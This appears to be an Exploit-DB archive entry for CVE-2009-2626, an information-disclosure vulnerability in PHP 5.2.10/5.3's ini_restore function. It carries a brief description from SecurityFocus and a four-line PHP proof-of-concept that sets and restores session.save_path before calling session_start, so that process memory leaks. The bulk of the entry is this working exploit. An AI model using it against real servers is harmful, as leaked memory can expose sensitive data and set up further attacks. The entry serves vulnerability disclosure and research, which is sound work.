PHP 5.2.10/5.3 - 'ini_restore' Memory Information Disclosure Vulnerability 1

2009-08-10T00:00:00
ID EDB-ID:33162
Type exploitdb
Reporter Maksymilian Arciemowicz
Modified 2009-08-10T00:00:00

Description

PHP 5.2.10/5.3 'ini_restore()' Memory Information Disclosure Vulnerability (1). CVE-2009-2626. Remote exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/36009/info

PHP is prone to an information-disclosure vulnerability.

Attackers can exploit this issue to obtain sensitive information that may lead to further attacks. 

<?php

ini_set("session.save_path", "0123456789ABCDEF");
ini_restore("session.save_path");
session_start();
?>